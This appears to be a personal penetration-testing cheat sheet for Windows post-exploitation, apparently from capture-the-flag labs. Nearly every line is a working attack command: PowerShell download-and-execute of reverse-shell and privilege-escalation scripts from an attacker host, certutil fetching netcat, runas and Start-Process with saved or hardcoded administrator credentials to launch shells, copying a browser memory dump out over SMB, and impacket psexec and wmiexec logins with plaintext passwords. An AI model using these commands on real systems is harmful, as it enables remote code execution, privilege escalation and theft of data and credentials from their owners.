#find file 
dir directory\*.txt /s /p

#Run file remotely
powershell -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.112/Invoke-PowerShellTcp.ps1')

powershell -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.112/Invoke-PowerShellTcp.ps1')"

powershell -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.112/Sherlock.ps1'); Find-AllVulns "

powershell -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.112/powerUp.ps1');"

powershell -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.112/jaws-enum.ps1');"

powershell -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.112/Sherlock.ps1'); "

powershell -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.112/Sherlock.ps1')

powershell -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.112/powershell_attack.txt')

#Encoded command powershell

cat shell3 | iconv --to-code UTF-16LE |   base64 -w 0
powershell -EncodedCommand JwBtAGkAawBlAGYAcgBvAGIAYgBpAG4AcwAuAGMAbwBtACcA


#Calling a specific PowerShell function from the command line
powershell -File script.ps1 -Command My-Func
powershell -File Sherlock.ps1 -Command Find-AllVulns
powershell -File jaws-enum.ps1 -OutputFileName Jaws-Enum.txt

more < letter.txt
type letter.txt | more 


#Download file

$url = "http://10.10.16.112/powerUp.ps1";$output = "C:\Users\Chase\Desktop\powerUp.ps1";$wc = New-Object System.Net.WebClient;$wc.DownloadFile($url, $output);

certutil -urlcache -split -f http://10.10.16.112/nc.exe nc.exe

(new-object System.Net.WebClient).DownloadFile('http://10.10.16.112/powerUp.ps1','C:\Windows\Temp\test\powerup.ps1')

(new-object System.Net.WebClient).DownloadFile('http://10.10.16.112/jaws-enum.ps1','C:\Windows\Temp\test\jaws-enum.ps1')

(new-object System.Net.WebClient).DownloadFile('http://10.10.16.112/Sherlock.ps1','C:\Windows\Temp\test\Sherlock.ps1')

(new-object System.Net.WebClient).DownloadFile('http://10.10.16.112/windows-exploit-suggester.py','C:\Windows\Temp\test\windows-exploit-suggester.py')


powershell (new-object System.Net.WebClient).DownloadFile('http://10.10.16.112/MS16-032.ps1','C:\Users\kostas\Desktop\MS16-032.ps1')

powershell -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.112/MS16-135.ps1')

#Auto-Login

$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force;$creds =New-Object System.Management.Automation.PSCredential('administrator', $passwd)

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.16.112/Invoke-PowerShellTcp.ps1')" -Credential $creds



#Runas
cat shell3 | iconv --to-code UTF-16LE |   base64 -w 0

runas /profile /savecred /user:ACCESS\Administrator "cmd /c ping -n 1 10.10.16.112" 

runas /profile /savecred /user:ACCESS\Administrator "powershell -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.112/Invoke-PowerShellTcp.ps1')" 



Another simple way is
runas /user:ACCESS\Administrator /savecred "powershell -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.36/Invoke-PowerShellTcp3.ps1')"


#copy big file 
*/opt/impacket/examples/smbserver.py test . -smb2support -username guest -password guest (on linux)

*net use x: \\10.10.16.112\test  /user:guest guest 
*cmd /c "copy firefox.exe_200131_084937.dmp x:\"

#Connect as Admin 
python /opt/impacket/examples/psexec.py active/Administrator:Ticketmaster1968@10.10.10.100
python /opt/impacket/examples/psexec.py active/Administrator@10.10.10.100

python /opt/impacket/examples/wmiexec.py active.htb/administrator:ThePassword@10.10.10.100